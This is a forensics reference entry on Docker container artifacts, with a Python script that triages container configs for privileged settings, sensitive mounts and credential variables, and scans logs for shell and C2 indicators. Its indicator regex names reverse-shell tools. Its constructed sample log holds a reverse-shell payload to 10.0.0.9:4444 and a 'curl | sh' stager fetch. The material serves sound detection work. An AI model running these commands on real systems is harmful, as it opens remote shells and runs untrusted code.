Docker / Container Runtime Artifacts
Location
/var/lib/docker/ (containers/, image/, overlay2/, volumes/) and docker daemon logs
Description
Docker daemon artifacts including container configurations (config.v2.json), image layers and manifests, overlay2 filesystem diffs showing container modifications, volume mounts, network settings, and container execution logs.
Forensic Value
Container forensics matters more as attackers target containerized environments. The per-container config file (containers/<id>/config.v2.json) records the image the container was started from, its environment variables (which often carry credentials), bind mounts of host directories, and whether it runs privileged, with added capabilities, or in the host PID or network namespace. The overlay2 diff directory of the container's writable layer holds only files created or changed after the container started, which isolates attacker activity from the read-only image layers. Container logs (containers/<id>/<id>-json.log when the default json-file log driver is in use) capture application stdout and stderr, including exploitation attempts and C2 communication. Host-mounted volumes may expose sensitive host data to the container, and a bind-mounted Docker socket gives the container control of the daemon itself. Caveat: removing a container deletes its writable layer and its json-file log with it, so preserve the docker root before any cleanup.
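As an added example (not code from the original page or from Docker), the triage below parses a container's config.v2.json for the settings the paragraph calls out (privileged mode, added capabilities, host namespaces, sensitive bind mounts, credential-like environment variables) and scans json-file driver log lines for shell and C2 indicators. The config, log lines, indicator regexes, and the list of "sensitive" host paths are all constructed for the example; tune them to the case. File locations in the comments follow the default layout under /var/lib/docker.

```python
"""Triage one container's config.v2.json and json-file log (added example).

Default Docker layout this example assumes:
  /var/lib/docker/containers/<id>/config.v2.json   container config
  /var/lib/docker/containers/<id>/<id>-json.log    json-file driver log
  /var/lib/docker/image/overlay2/layerdb/mounts/<id>/mount-id
      -> name of the overlay2 dir; the writable layer is
         /var/lib/docker/overlay2/<mount-id>/diff
The sample config and log lines below are constructed, not from a real host.
"""
import json
import re

# Host paths that give a container leverage over the host when bind-mounted (example list).
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/proc", "/sys",
                        "/var/run/docker.sock", "/run/docker.sock", "/var/lib/docker")
# Capabilities that commonly enable escape or host tampering (example list).
DANGEROUS_CAPS = {"ALL", "SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "NET_ADMIN", "DAC_READ_SEARCH"}
CRED_ENV = re.compile(r"(PASS|PASSWD|SECRET|TOKEN|API_?KEY|PRIVATE_KEY|ACCESS_KEY)", re.I)
# Strings that stand out in application logs as shell or C2 activity (example list).
LOG_INDICATORS = re.compile(r"/dev/tcp/|bash\s+-i|\bnc\b.*\s-e\b|\b(curl|wget)\b.*https?://|/bin/sh\s+-i")


def _sensitive_bind(src):
    if src == "/":
        return True
    return any(src == p or src.startswith(p + "/")
               for p in SENSITIVE_HOST_PATHS if p != "/")


def triage_config(cfg):
    """Return (category, detail) findings from a parsed config.v2.json."""
    findings = []
    hc = cfg.get("HostConfig") or {}
    if hc.get("Privileged"):
        findings.append(("privileged", cfg.get("Name", "")))
    for cap in hc.get("CapAdd") or []:
        name = cap.upper()
        name = name[4:] if name.startswith("CAP_") else name
        if name in DANGEROUS_CAPS:
            findings.append(("capability", name))
    if hc.get("PidMode") == "host":
        findings.append(("host-pid", ""))
    if hc.get("NetworkMode") == "host":
        findings.append(("host-net", ""))
    # Binds entries look like "host_path:container_path[:options]".
    for bind in hc.get("Binds") or []:
        src = bind.split(":", 1)[0]
        if _sensitive_bind(src):
            findings.append(("bind", src))
    for env in (cfg.get("Config") or {}).get("Env") or []:
        key = env.partition("=")[0]
        if CRED_ENV.search(key):
            findings.append(("env", key))
    return findings


def scan_json_log(lines):
    """Parse json-file driver lines ({"log":..,"stream":..,"time":..}) and
    return (time, stream, text) for entries matching LOG_INDICATORS."""
    hits = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        try:
            entry = json.loads(raw)
        except json.JSONDecodeError:
            continue  # truncated tail line after an unclean shutdown
        text = entry.get("log", "").rstrip("\n")
        if LOG_INDICATORS.search(text):
            hits.append((entry.get("time"), entry.get("stream"), text))
    return hits


# Constructed sample config: a privileged nginx container with the Docker socket and /etc mounted.
SAMPLE_CONFIG = json.loads(r'''{
  "ID": "3f1c9e1b7a4d5c6e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e",
  "Name": "/web-app",
  "Driver": "overlay2",
  "Config": {
    "Image": "nginx:1.25",
    "Env": ["PATH=/usr/local/sbin:/usr/bin", "DB_PASSWORD=hunter2", "API_TOKEN=abc123"],
    "Cmd": ["nginx", "-g", "daemon off;"]
  },
  "HostConfig": {
    "Privileged": true,
    "CapAdd": ["SYS_PTRACE"],
    "PidMode": "host",
    "NetworkMode": "bridge",
    "Binds": ["/var/run/docker.sock:/var/run/docker.sock",
              "/srv/www:/usr/share/nginx/html:ro",
              "/etc:/host-etc"]
  }
}''')

# Constructed sample of <id>-json.log: two benign requests, one reverse-shell attempt, one stager fetch.
SAMPLE_LOG = r'''
{"log":"10.0.0.5 - - [12/May/2024:10:00:01 +0000] \"GET /index.html HTTP/1.1\" 200 612\n","stream":"stdout","time":"2024-05-12T10:00:01.000000000Z"}
{"log":"10.0.0.9 - - [12/May/2024:10:00:07 +0000] \"GET /cgi-bin/x.cgi?c=bash+-i+>%26+/dev/tcp/10.0.0.9/4444+0>%261 HTTP/1.1\" 500 0\n","stream":"stdout","time":"2024-05-12T10:00:07.000000000Z"}
{"log":"sh -c 'curl -s http://10.0.0.9/stage2.sh | sh'\n","stream":"stderr","time":"2024-05-12T10:00:09.000000000Z"}
{"log":"10.0.0.5 - - [12/May/2024:10:00:15 +0000] \"GET /favicon.ico HTTP/1.1\" 404 153\n","stream":"stdout","time":"2024-05-12T10:00:15.000000000Z"}
'''.strip().splitlines()

if __name__ == "__main__":
    for finding in triage_config(SAMPLE_CONFIG):
        print("config:", *finding)
    for hit in scan_json_log(SAMPLE_LOG):
        print("log:", *hit)
```

On a real image, point the two functions at containers/<id>/config.v2.json and containers/<id>/<id>-json.log, then diff the overlay2 writable layer (overlay2/<mount-id>/diff) against the image to see what the attacker actually wrote. The indicator lists are deliberately short; expand them from the case rather than trusting them as a general signature set.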